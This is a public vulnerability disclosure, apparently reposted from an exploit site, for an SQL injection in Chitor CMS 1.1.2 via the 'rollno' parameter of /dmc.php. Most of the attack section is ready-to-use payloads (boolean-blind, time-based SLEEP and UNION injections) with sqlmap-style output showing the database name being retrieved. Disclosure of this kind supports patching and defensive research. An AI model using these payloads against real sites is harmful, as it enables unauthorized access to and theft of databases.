Chitor CMS 1.1.2 SQL Injection – Torchsec
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://github.com/waqaskanju/Chitor-CMS │
│ Vendor : Waqas Ahmad │
│ Software : Chitor-CMS 1.1.2 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /dmc.php
https://website/dmc.php?rollno=[SQLI]&submit=
GET parameter 'rollno' is vulnerable to SQLI
[+] Starting the Attack
---
Parameter: rollno (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: rollno=(SELECT (CASE WHEN (8157=8157) THEN 123 ELSE (SELECT 6602 UNION SELECT 8316) END))&submit=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: rollno=123 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))WFHu)&submit=1
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: rollno=123 UNION ALL SELECT NULL,NULL,CONCAT(0x7178627871,0x795671465a5a414e7252507a55426e644b53514b45556c7a554f73727674517276705877617a5541,0x71627a7171),NULL,NULL,NULL-- -&submit=1
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[INFO] fetching current database
current database: '***0611***_chitor_db'
[-] Done
Gloss